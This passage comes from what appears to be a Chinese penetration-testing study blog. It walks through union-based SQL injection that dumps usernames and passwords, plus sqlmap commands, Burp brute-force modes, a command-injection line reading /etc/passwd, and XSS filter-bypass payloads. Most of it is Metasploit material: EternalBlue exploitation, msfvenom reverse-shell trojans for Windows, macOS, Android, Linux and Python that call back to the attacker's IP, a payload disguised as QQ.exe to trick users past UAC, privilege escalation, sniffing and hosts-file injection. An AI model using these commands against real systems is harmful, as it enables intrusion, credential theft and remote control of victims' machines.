invoke__">query</span>(<span class="variable">$sql</span>)===<span class="literal">TRUE</span>)&#123;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;删除成功&quot;</span>;</span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;删除失败&quot;</span>.<span class="variable">$conn</span>-&gt;error;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$conn</span>-&gt;<span class="title function_ invoke__">close</span>();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;我是网页&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line"></span><br><span class="line">&lt;body&gt;</span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$servername</span> = <span class="string">&quot;localhost&quot;</span>;</span><br><span class="line"><span class="variable">$username</span> = <span class="string">&quot;root&quot;</span>;</span><br><span class="line"><span class="variable">$password</span> = <span class="string">&quot;root&quot;</span>;</span><br><span class="line"><span class="variable">$dbname</span> = <span class="string">&quot;haha&quot;</span>;<span class="comment">//数据库库名</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//创建连接</span></span><br><span class="line"><span class="variable">$conn</span> = <span class="keyword">new</span> <span class="title function_ invoke__">mysqli</span>(<span class="variable">$servername</span>,<span class="variable">$username</span>,<span class="variable">$password</span>,<span class="variable">$dbname</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">//检测链接</span></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$conn</span>-&gt;connect_error)&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;连接失败&quot;</span>.<span class="variable">$conn</span>-&gt;connect_error);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//数据库查语句</span></span><br><span class="line"><span class="comment">//准备一条数据库语句</span></span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;SELECT * FROM table1 WHERE id &lt; 4&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">//执行sql语句并且返回给变量</span></span><br><span class="line"><span class="variable">$result</span> = <span class="variable">$conn</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">//判断$result里是否有东西</span></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$result</span>-&gt;num_rows&gt;<span class="number">0</span>)&#123;</span><br><span class="line">    <span class="comment">//输出数据</span></span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;table border=&#x27;1&#x27;&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;tr&gt;&lt;th&gt;id&lt;/th&gt; &lt;th&gt;username&lt;/th&gt; &lt;th&gt;job&lt;/th&gt;&lt;/tr&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">while</span>(<span class="variable">$row</span> = <span class="variable">$result</span>-&gt;<span class="title function_ invoke__">fetch_assoc</span>())&#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;tr&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;td&gt;&quot;</span>.<span class="variable">$row</span>[<span class="string">&#x27;id&#x27;</span>].<span class="string">&quot;&lt;/td&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;td&gt;&quot;</span>.<span class="variable">$row</span>[<span class="string">&#x27;username&#x27;</span>].<span class="string">&quot;&lt;/td&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;td&gt;&quot;</span>.<span class="variable">$row</span>[<span class="string">&#x27;job&#x27;</span>].<span class="string">&quot;&lt;/td&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;/tr&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;/table&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$conn</span>-&gt;<span class="title function_ invoke__">close</span>();</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>漏洞为什么会出现？</p>
<p>因为和用户有互动</p>
<p>需要调用后端的逻辑代码，甚至需要调用数据库或者操作系统的指令</p>
<h2 id="命令行连接数据库"><a href="#命令行连接数据库" class="headerlink" title="命令行连接数据库"></a>命令行连接数据库</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql <span class="operator">-</span>uroot <span class="operator">-</span>proot</span><br></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">show</span> databases;</span><br></pre></td></tr></table></figure>

<p>查看所有的库名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use haha;</span><br></pre></td></tr></table></figure>

<p>使用haha这个库名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">show</span> tables;</span><br></pre></td></tr></table></figure>

<p>查看库中有什么表</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> table1;</span><br></pre></td></tr></table></figure>

<p>查看table1这张表的所有数据</p>
<hr>
<p>估算目标数据库的语法</p>
<h2 id="猜测对方数据库语句"><a href="#猜测对方数据库语句" class="headerlink" title="猜测对方数据库语句"></a>猜测对方数据库语句</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> username,password <span class="keyword">from</span> tablex <span class="keyword">where</span> id<span class="operator">=</span><span class="string">&#x27; 2\ &#x27;</span> limit <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>黑客需要破坏数据库语句</p>
<p>目的是为了知道数据库的闭合方式</p>
<h2 id="所有的闭合方式"><a href="#所有的闭合方式" class="headerlink" title="所有的闭合方式"></a>所有的闭合方式</h2><p>‘ ‘ </p>
<p>“  “</p>
<p>(  )</p>
<p>(‘  ‘)</p>
<p>((‘  ‘))</p>
<p>(“  “)</p>
<p>((“  “)) </p>
<p>((  )) </p>
<p>没有任何闭合方式的 </p>
<p>id=2’</p>
<p>‘ ‘1&#39; LIMIT 0,1 ‘ 去头去尾</p>
<p>‘1&#39; LIMIT 0,1</p>
<p>\ = 转义字符，把自己后面的第一个东西变成字符串</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> username,password <span class="keyword">from</span> tablex <span class="keyword">where</span> id<span class="operator">=</span><span class="string">&#x27; 2\&#x27;</span> limit <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>一个单引号或者\ 或者其他符号 导致数据库懵逼</p>
<p>所以知道了闭合方式是’闭合</p>
<p>数据库注释符：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/* */</span></span><br><span class="line"></span><br><span class="line">#</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>+ 在get请求里相当于空格</p>
<p>+一般配合 – 作为数据库get请求的注释符使用</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> username,password <span class="keyword">from</span> tablex <span class="keyword">where</span> id<span class="operator">=</span><span class="string">&#x27; 2&#x27;</span> <span class="comment">--+ &#x27; limit 0,1</span></span><br></pre></td></tr></table></figure>

<p>执行的时候会变成 </p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> username,password <span class="keyword">from</span> tablex <span class="keyword">where</span> id<span class="operator">=</span><span class="string">&#x27; 2&#x27;</span></span><br></pre></td></tr></table></figure>

<p>输入‘2’查询正常，说明使用‘’ 进行闭合的</p>
<h2 id="确定有多少个栏目"><a href="#确定有多少个栏目" class="headerlink" title="确定有多少个栏目"></a>确定有多少个栏目</h2><p> id=2’ order by [数字] –+</p>
<p>id=2’ order by  3  –+ 显示正常，order by 4显示不正常，</p>
<p>说明它数据库select后面只有三个东西</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> id,username,password <span class="keyword">from</span> tablex <span class="keyword">where</span> id<span class="operator">=</span><span class="string">&#x27; 2&#x27;</span> <span class="keyword">order</span> <span class="keyword">by</span> <span class="number">10</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>发现order by 3正常</p>
<p>说明他数据库里有3个栏目</p>
<h2 id="显示报错位"><a href="#显示报错位" class="headerlink" title="显示报错位"></a>显示报错位</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> id,username,password <span class="keyword">from</span> tablex <span class="keyword">where</span> id<span class="operator">=</span><span class="string">&#x27; -2&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="comment">--+ &#x27; limit 0,1</span></span><br></pre></td></tr></table></figure>

<p>id = 1 正确的查询数据会覆盖掉 union select 因我们需要输入错误的id 使得数据库懵逼</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id<span class="operator">=</span><span class="number">-2</span><span class="string">&#x27; union select 1,2,3 --+</span></span><br></pre></td></tr></table></figure>

<p>发现报错位是2,3</p>
<h2 id="查看数据库的库名"><a href="#查看数据库的库名" class="headerlink" title="查看数据库的库名"></a>查看数据库的库名</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">id<span class="operator">=</span><span class="number">-2</span><span class="string">&#x27; union select 1,database(),3 --+</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">库名是security</span></span><br></pre></td></tr></table></figure>

<p>MySQL中的DATAbase()函数返回默认或当前数据库的名称。DATAbase()函数返回的字符串或名称使用utf8字符集。如果没有默认数据库，则Database函数返回NULL。</p>
<p>在比MySQL 4.1.1更旧的版本中，如果没有默认数据库，则数据库函数用于返回空字符串。</p>
<p>语法 ：SELECT DATAbase();</p>
<p>DATAbase()函数易于使用，不接受任何参数。我们可以使用MySQL控制台上的上述语法轻松获取默认数据库的名称。</p>
<p>示例：</p>
<p>让我们考虑默认数据库的名称是“Employees”。因此，要知道默认数据库的名称，可以通过以下方式执行数据库功能：<img src="C:\Users\Fzzf\AppData\Roaming\Typora\typora-user-images\image-20221230145352309.png" alt="image-20221230145352309"></p>
<h2 id="根据库名找到表名"><a href="#根据库名找到表名" class="headerlink" title="根据库名找到表名"></a>根据库名找到表名</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id<span class="operator">=</span><span class="number">-2</span><span class="string">&#x27; union select 1,table_name,3 from information_schema.tables where table_schema = &#x27;</span>security<span class="string">&#x27; limit 0,1 --+</span></span><br></pre></td></tr></table></figure>

<p>查到表名emails，referers，uagents，users</p>
<hr>
<p>mysql数据库中有一些表（是view，只能做select操作）记录了现有表的meta data，比如某个column的名字，它的定义是什么等等。</p>
<p>列出test数据库中所有的表名，类型(普通表还是view)和使用的引擎</p>
<p>select table_name, table_type, engine</p>
<p>FROM information_schema.tables</p>
<p>WHERE table_schema = ‘库名’</p>
<p>ORDER BY table_name DESC;</p>
<p>解释： 对表的meta data的查询需要使用information_schema.tables， table_schema是数据库的名称，table_name是具体的表名，table_type指的是表的类型</p>
<hr>
<p>黑客觉得users里面的数据很有前途</p>
<h2 id="根据表名找到users里的列名"><a href="#根据表名找到users里的列名" class="headerlink" title="根据表名找到users里的列名"></a>根据表名找到users里的列名</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id<span class="operator">=</span><span class="number">-2</span><span class="string">&#x27; union select 1,column_name,3 from information_schema.columns where table_schema = &#x27;</span>security<span class="string">&#x27; and table_name = &#x27;</span>users<span class="string">&#x27; limit 0,1 --+</span></span><br></pre></td></tr></table></figure>

<p>发现users里有id，username，password</p>
<h2 id="拿到所有的username和password的值"><a href="#拿到所有的username和password的值" class="headerlink" title="拿到所有的username和password的值"></a>拿到所有的username和password的值</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">id<span class="operator">=</span><span class="number">-2</span><span class="string">&#x27; union select 1,group_concat(username),group_concat(password) from users --+</span></span><br><span class="line"><span class="string">/*或者*/</span></span><br><span class="line"><span class="string">?id=-2&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,username,password <span class="keyword">from</span> users limit <span class="number">2</span>,<span class="number">1</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<h2 id="用命令行操作数据库"><a href="#用命令行操作数据库" class="headerlink" title="用命令行操作数据库"></a>用命令行操作数据库</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">mysql <span class="operator">-</span>u用户名 <span class="operator">-</span>p密码</span><br><span class="line"><span class="keyword">show</span> databases; 看到所有数据库的库名</span><br><span class="line">use [库名]; 进入某个数据库</span><br><span class="line"><span class="keyword">show</span> tables; 查看数据库有多少表</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> [表名]; 查看表中所有内容</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> table1 <span class="keyword">where</span> id <span class="operator">&lt;</span> <span class="number">13</span> limit <span class="number">1</span>,<span class="number">2</span>;</span><br><span class="line"><span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>;</span><br><span class="line"><span class="keyword">union</span> 联合查询（limit会坏好事）</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> table1 <span class="keyword">where</span> id <span class="operator">&lt;</span> <span class="number">13</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>;</span><br></pre></td></tr></table></figure>

<h2 id="Web渗透中目标不同的组合"><a href="#Web渗透中目标不同的组合" class="headerlink" title="Web渗透中目标不同的组合"></a>Web渗透中目标不同的组合</h2><p>windows+iis+asp/aspx(asp.net)+access/mssql</p>
<p>windows+apache+php+mysql= wamp（一般使用软件进行集成化搭建）</p>
<p>linux+apache/nginx+php+mysql = lamp/lnmp（有可能使用宝塔或者其他面板搭建）</p>
<p>linux+tomcat+java(jsp)+oracle/mysql </p>
<p>linux+nginx+python(django/flask/tornado/fastapi)/go(beego/gin)+mysql</p>
<hr>
<h2 id="sqlmap（sql注入神器）"><a href="#sqlmap（sql注入神器）" class="headerlink" title="sqlmap（sql注入神器）"></a>sqlmap（sql注入神器）</h2><p>sqlmap的标准用法：</p>
<p>sqlmap -u [目标url] –dbs</p>
<p>获取目标网站的库名</p>
<p>发现security库</p>
<p>sqlmap -u [目标url] -D [security(库名)] –tables</p>
<p>获取库里的表</p>
<p>sqlmap -u [目标url] -D security -T users –columns</p>
<p>根据表 查看列</p>
<p>sqlmap -u [目标url] -D security -T users -C username,password –dump</p>
<p>取出id,username,password的所有内容</p>
<p>完整版命令：</p>
<p>sqlmap -u [目标url] –dbs –batch –threads 10 –technique U</p>
<p>使用sqlmap查看目标网站的数据库库名，忽略错误，开10线程，使用union select注入目标网站。</p>
<p>–technique [注入方式]</p>
<p>E=报错注入</p>
<p>B=布尔型注入</p>
<p>T = 布尔型时间盲注</p>
<hr>
<p>E 报错注入：无法发现报错位，但是数据库出错会出现 此时用报错注入</p>
<p>(error based)</p>
<p>sqlmap -u [目标url] –current-db –batch –threads 10 –technique E</p>
<p>使用报错注入</p>
<hr>
<p>B 布尔型注入：无法发现报错位，数据库闭合破坏也不出现，但是界面上只会出现有和没有东西两种情况（你被勒索了你就眨眨眼）</p>
<p>(booled based)</p>
<p>sqlmap -u [目标url] –current-db –batch –threads 10 –technique B</p>
<hr>
<p>T 布尔型时间盲注：无法发现报错位，数据库闭合被破坏也不出现，界面也没有出现或者消失东西的现象</p>
<p>(time based)</p>
<p>sqlmap -u [目标url] –current-db –batch –threads 10 –technique T -v 3</p>
<hr>
<p>post方面注入： </p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$uname <span class="operator">=</span> $_POST[<span class="string">&#x27;uname&#x27;</span>];</span><br><span class="line"></span><br><span class="line">$passwd <span class="operator">=</span> $_POST[<span class="string">&#x27;password&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> username,password <span class="keyword">from</span> users <span class="keyword">where</span> username<span class="operator">=</span><span class="string">&#x27;$uname&#x27;</span> <span class="keyword">and</span> password<span class="operator">=</span><span class="string">&#x27;$passwd&#x27;</span> limit <span class="number">0</span>,<span class="number">1</span></span><br><span class="line"></span><br><span class="line">sqlmap <span class="operator">-</span>u http:<span class="operator">/</span><span class="operator">/</span>sqlilabs.njhack.xyz<span class="operator">/</span>Less<span class="number">-11</span><span class="operator">/</span> <span class="comment">--data &quot;uname=admin*&amp;passwd=admin&amp;submit=Submit&quot; --current-db --batch --threads 10 --technique </span></span><br></pre></td></tr></table></figure>

<p> –data 后面跟的是post的数据</p>
<p>*号标哪，就是让sqlmap打哪</p>
<h2 id="Dvwa-靶场"><a href="#Dvwa-靶场" class="headerlink" title="Dvwa 靶场"></a>Dvwa 靶场</h2><p>用户名admin 密码password</p>
<h3 id="Brute-Force"><a href="#Brute-Force" class="headerlink" title="Brute Force"></a>Brute Force</h3><p>暴力破解</p>
<p>仔细观察密码输入错误和正确的页面返回的大小是不一样的</p>
<p>使用burp抓包，send to intruder ，调整参数 clear add</p>
<h3 id="Burp-Intruder"><a href="#Burp-Intruder" class="headerlink" title="Burp Intruder"></a>Burp Intruder</h3><h4 id="Sniper模式"><a href="#Sniper模式" class="headerlink" title="Sniper模式"></a>Sniper模式</h4><p>单向爆破</p>
<p>用途：知道用户名 不知道密码的情况， 破解一些单一的输入框</p>
<h4 id="Battering-ram-模式"><a href="#Battering-ram-模式" class="headerlink" title="Battering ram 模式"></a>Battering ram 模式</h4><p>并发攻击，对多个目标进行单一的payload攻击</p>
<p>Payload: 攻击载荷 （猜密码的字典）</p>
<p>也就是用户名和密码一致的情况 （工号，学号）</p>
<h4 id="Pitchfork-模式"><a href="#Pitchfork-模式" class="headerlink" title="Pitchfork 模式"></a>Pitchfork 模式</h4><p>交叉攻击（撞库）</p>
<p>有几个变量 就可以选择几个字典，随机抽取字典的东西穷举</p>
<h4 id="Cluster-bomb模式"><a href="#Cluster-bomb模式" class="headerlink" title="Cluster bomb模式"></a>Cluster bomb模式</h4><p>完整的爆破</p>
<h2 id="验证码"><a href="#验证码" class="headerlink" title="验证码"></a>验证码</h2><p>1.使用打码平台</p>
<p>2.人工智能（机器学习，深度学习，神经网络）</p>
<h2 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>命令注入</h2><p>Command injection （命令执行漏洞）</p>
<p>一个地方可以执行操作系统的命令</p>
<p>如果在 Linux 环境下</p>
<p>Ping 127.0.0.1 &amp; cat /etc/passwd  几乎同时执行</p>
<p>Ping 127.0.0.1 &amp;&amp; cat /etc/passwd 执行完左边去执行右边</p>
<p>Ping 127.0.0.1 | cat /etc/passwd 只执行右边</p>
<hr>
<h2 id="Xss-跨站脚本攻击"><a href="#Xss-跨站脚本攻击" class="headerlink" title="Xss 跨站脚本攻击"></a>Xss 跨站脚本攻击</h2><p>DOM型（有编程要求）</p>
<p>反射型（无要求）</p>
<p>存储型（有一点要求） </p>
<p>标准测试语法 </p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>如果script替换为空 </p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;scr&lt;script&gt;ipt&gt;<span class="title function_">alert</span>(<span class="number">1</span>)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>前端代码是不识别大小写的</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;scRIpt&gt;<span class="title function_">alert</span>(<span class="number">1</span>)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>图片无法加载可以触发js</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span> =<span class="string">’x</span>&#x27; <span class="attr">onerror</span>=<span class="string">&#x27;alert(1)&#x27;</span> /&gt;</span></span><br></pre></td></tr></table></figure>

<p>CSRF跨站请求伪造</p>
<hr>
<h2 id="MSF-Metasploit-攻击框架"><a href="#MSF-Metasploit-攻击框架" class="headerlink" title="MSF (Metasploit)攻击框架"></a>MSF (Metasploit)攻击框架</h2><p>木马 = 服务端（目标） + 控制端（黑客）</p>
<p>msfconsole 打开msf</p>
<p>可以调用nmap</p>
<p>nmap -sV [目标ip]</p>
<p>永恒之蓝 ms17_010</p>
<p>msf如果使用漏洞去攻击对方，需要的条件：</p>
<p>1.漏洞</p>
<p>2.攻击载荷（木马，病毒）</p>
<p>use exploit/windows/</p>
<p>smb/ms17_010_eternalblue</p>
<p>show options</p>
<p>set rhosts [目标ip]</p>
<p>run 运行</p>
<p>持续控制：background  sessions -i [number]</p>
<hr>
<h3 id="msf内网渗透"><a href="#msf内网渗透" class="headerlink" title="msf内网渗透"></a>msf内网渗透</h3><p>生成exe木马</p>
<p>生成32位系统的木马</p>
<p>msfvenom -a x86 -platform windows -p windowsmeterpreter/reverse_tcp lhost=[自己ip] lport=4444 -f exe &gt; msf.exe</p>
<p>生成64位木马</p>
<p>msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.31.110 lport=4444 -f exe -o msf.exe</p>
<hr>
<h3 id="在msf里建立木马的控制端"><a href="#在msf里建立木马的控制端" class="headerlink" title="在msf里建立木马的控制端"></a>在msf里建立木马的控制端</h3><p>msfconsole</p>
<p>use exploit/multi/handler</p>
<p>set payload windows/meterpreter/reverse_tcp</p>
<p>#如果生成64位木马 set payload windows/x64/meterpreter/reverse_tcp</p>
<p>set lhost [自己的ip]</p>
<p>set lport 4444</p>
<p>exploit 进入监听状态</p>
<p>此时如果木马启动，就会连接我</p>
<p>background 暂时不操作，把木马放到后台</p>
<p>sessions 查看控制了多少人</p>
<p>sessions -i [编号] 连接编号位几的木马</p>
<p>back 后退一个</p>
<p>exit 彻底退出</p>
<h3 id="其他木马的命令："><a href="#其他木马的命令：" class="headerlink" title="其他木马的命令："></a>其他木马的命令：</h3><p>生成mac（旧版本苹果电脑）木马</p>
<p>msfvenom -a x86 –platform osx -p osx/x86/shell_reverse_tcp lhost=[自己ip] lport=4444 -f macho -p msf.macho</p>
<p>生成android（旧版本安卓，需要数字签名）木马</p>
<p>msfvenom -a x86 –platform Android -p android/meterpreter/reverse_tcp lhost=[自己ip] lport=4444 -f apk -o msf.apk</p>
<p>生成powershell木马</p>
<p>msfvenom -a x86 –platform windows -p windows/powershell_reverse_tcp lhost=[自己ip] lport=4444 -e cmd/powershell_base64 -i 3 -f raw -o msf.ps1</p>
<p>生成linux木马</p>
<p>msfvenom -a x86 –platform Linux -p linux/x86/meterpreter/reverse_tcp lhost=[自己ip] lport=4444 -f elf -o msf.elf</p>
<p>生成python木马</p>
<p>msfvenom -p python/meterpreter/reverse_tcp lhost=[自己ip] lport=4444 -f raw -o msf.py</p>
<h2 id="meterpreter的操作："><a href="#meterpreter的操作：" class="headerlink" title="meterpreter的操作："></a>meterpreter的操作：</h2><p>UAC提权</p>
<p>getuid 查看当前的权限</p>
<p>getsystem 直接提权</p>
<p>（有风险，有可能会报错）</p>
<p>考虑使用ask模块提权</p>
<p>background 把木马放到后台</p>
<p>use exploit/windows/local/ask 加载ask模块</p>
<p>info 查看漏洞信息</p>
<p>set session [编号] 把漏洞用在几号木马控制的目标上</p>
<p>set filename QQ.exe 伪装成qq程序</p>
<p>exploit</p>
<p>会在用户桌面弹出一个是否允许qq启动，用户选择yes，成功！</p>
<p>之后会反弹给我一个新的session，进入这个新的session</p>
<p>getuid 发现还不是system</p>
<p>getsystem 提高到system权限</p>
<hr>
<p>UAC绕过提权（成功率不高，并且只能拿来对付32位系统）</p>
<p>use exploit/windows/local/bypassuac</p>
<p>show options</p>
<p>set session [编号]</p>
<p>exploit 开始攻击</p>
<p>之后会反弹给我一个新的session，进入这个新的session</p>
<p>getuid 发现还不是system</p>
<p>getsystem 提高到system权限</p>
<h2 id="系统权限："><a href="#系统权限：" class="headerlink" title="系统权限："></a>系统权限：</h2><p>windows：</p>
<p>system</p>
<p>administrator</p>
<p>(others)</p>
<hr>
<p>linux:</p>
<p>root</p>
<p>(others)</p>
<p>CPU：</p>
<p>OS（操作系统）</p>
<p>ring0（驱动程序）   windows ddk</p>
<p>ring3（大多数软件）  windows sdk</p>
<hr>
<p>usb接口</p>
<p>硬件编程</p>
<hr>
<p>msxx_xxx 微软漏洞编号    ms14_058 ms16_016</p>
<p>cve xxx-xxxxx CVE的漏洞编号 </p>
<p>cnnvd xxx-xxxx CNNVD漏洞编号</p>
<h2 id="目标信息搜集："><a href="#目标信息搜集：" class="headerlink" title="目标信息搜集："></a>目标信息搜集：</h2><p>需要进入到session里</p>
<p>run post/windows/gather/checkvm 检查对方是否是虚拟机</p>
<p>meterpreter &gt; run post/windows/gather/enum_services 查看运行的服务</p>
<p>run post/windows/gather/enum_applications 查看电脑安装了哪些应用</p>
<p>run post/windows/gather/dumplinks 查看最近的操作</p>
<p>run post/windows/gather/enum_shares 查看共享</p>
<p>run post/windows/gather/enum_patches 查看用户安装了哪些补丁</p>
<p>run winenum 搜集环境变量</p>
<hr>
<p><strong>数据和嗅探</strong></p>
<p>进入session中</p>
<p>load sniffer 加载sniffer模块</p>
<p>sniffer_interfaces 查看对方电脑的网卡</p>
<p>sniffer_start 2 对2号网卡进行嗅探</p>
<p>sniffer_dump 2 /root/123.cap 把2号网卡抓的数据包保存为/root/123.cap</p>
<p>wireshark 123.cap 直接使用wireshark打开123.cap这个包</p>
<p>sniffer_stop 2 停止对2号网卡的嗅探</p>
<h2 id="msf-host注入"><a href="#msf-host注入" class="headerlink" title="msf  host注入"></a>msf  host注入</h2><p>在meterpreter中background</p>
<p>use post/windows/manage/inject_host 使用注入模块</p>
<p>show options</p>
<p>set ip [自己的ip] 这里的ip是之后目标指向的ip</p>
<p>set domain [要篡改的域名] 要伪造什么域名</p>
<p>set sessions [目标session] 对哪个session id进行修改</p>
<p>exploit</p>
<hr>
<p>meterpreter &gt; background </p>
